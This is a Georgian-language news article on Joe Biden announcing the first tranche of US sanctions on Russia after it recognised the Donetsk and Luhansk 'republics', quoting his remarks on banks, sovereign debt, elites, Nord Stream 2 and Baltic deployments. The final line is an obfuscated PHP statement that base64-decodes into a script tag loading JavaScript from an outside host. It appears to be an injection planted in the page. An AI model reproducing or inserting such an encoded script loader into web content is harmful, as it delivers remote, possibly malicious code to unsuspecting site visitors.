celsiusi
ავერსი შნაიდერი
აშშ-ის პრეზიდენტმა, ჯო ბაიდენმა, რუსეთის მიერ დონეცკის და ლუგანსკის „სახალხო რესპუბლიკების“ საპასუხოდ რუსეთს სანქციების პირველი ტრანში დაუწესა.
 
ამ ეტაპზე ცნობილია, რომ დაწესდება შემდეგი სანქციები:
 
დაუწესდება სანქციები რუსულ ბანკებს – „ვი-თი-ბის“ და „რუსეთის სამხედრო ბანკს“;
დაწესდება სანქციები რუსეთის სუვერენულ ვალზე – მოსკოვს აეკრძალება ამერიკულ და ევროპულზე სახელმწიფო ვალის ობლიგაციების განთავსება.
ასევე, ბაიდენმა გამოაცხადა, რომ დაწესდება სანქციები „რუსული ელიტისა და მათი ოჯახების“ წინააღმდეგ. მისივე თქმით, გერმანიასთან ერთად „ყველაფერი გაკეთდება, „რათა „ჩრდილოეთის ნაკადი 2“-მა მუშაობა ვერ დაიწყოს“.
 
ბაიდენის განცხადებით, პუტინის გუშინდელი განცხადება მომავალი, უფრო მასშტაბური აგრესიისთვის ნიადაგის მომზადებაა. თუმცა, აღნიშნა აშშ-ის პრეზიდენტმა, ვაშინგტონი, 2014 წელთან შედარებით, ბევრად უფრო მკაცრ სანქციებს დააწესებს.
 
„ვინ მისცა პუტინს უფლება, გამოაცხადოს ახალი ე.წ. ქვეყნები ტერიტორიებზე, რომლებიც მის მეზობლებს ეკუთვნის?..
 
მე პირადად ვუთხარი პუტინს, რომ როცა რუსეთი უკრაინის წინააღმდეგ ნაბიჯს გადადგავდა, [ჩვენ და პარტნიორები] ერთად ვიმოქმედებდით. რუსეთმა, უდავოა, გადადგა ნაბიჯები უკრაინის წინააღმდეგ…
 
დღეს ვაცხადებ სანქციების პირველ ტრანშს. სანქციები გამკაცრდება, თუ რუსეთი ესკალაციას განაგრძობს“, – განაცხადა ბაიდენმა.
 
ამასთან ერთად, ბაიდენმა დააანონსა, რომ ევროპაში მყოფი ძალები და აღჭურვილობა დისლოცირდება ბალტიისპირეთის ქვეყნებში – „რუსეთის მიერ ბელარუსიდან ძალების არგაყვანის საპასუხოდ“. მან ხაზი გაუსვა, რომ ეს „თავდაცვითი ზომებია“ და აშშ/ნატო „რუსეთთან ომს არ აპირებს“.
 
„ჩვენ არ უნდა ვიყოთ სულელები და არ ვიქნებით კიდეც. რუსეთის მიერ უკრაინაში შეჭრა მომავალ დღეებში სერიოზულ საფრთხედ რჩება. თუ რუსეთი განაგრძობს, ეს მხოლოდ რუსეთის პასუხისმგებლობა იქნება…
 
როგორც ვთქვი, თავისუფლების დაცვას თავისი ფასი აქვს, მათ შორის ჩვენთან, ამერიკაში…
 
აშშ და მოკავშირეები ერთიანად მოქმედებენ. ჩვენ ერთიანი ვართ უკრაინის მხარდაჭერაში, ერთიანი ვართ რუსეთის აგრესიისდამი წინააღმდეგობაში, ერთიანი ვართ სურვილში, დავიცვათ ნატო და გვესმის, რამდენად სერიოზულია საფრთხე, რომელსაც რუსეთი მსოფლიო მშვიდობას და სტაბილურობას უქმნის…
 
ჯერ კიდევ არის დრო ყველაზე ცუდი სცენარისთვის თავიდან ასარიდებლად. აშშ და მოკავშირეები მზად არიან სერიოზული დიპლომატიისთვის. რუსეთს ჩვენ მისი ქმედებების და არა სიტყვების მიხედვით განვსჯით. რაც არ უნდა გააკეთოს რუსეთმა, მზად ვართ“, – აღნიშნა ბაიდენმა.
715
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");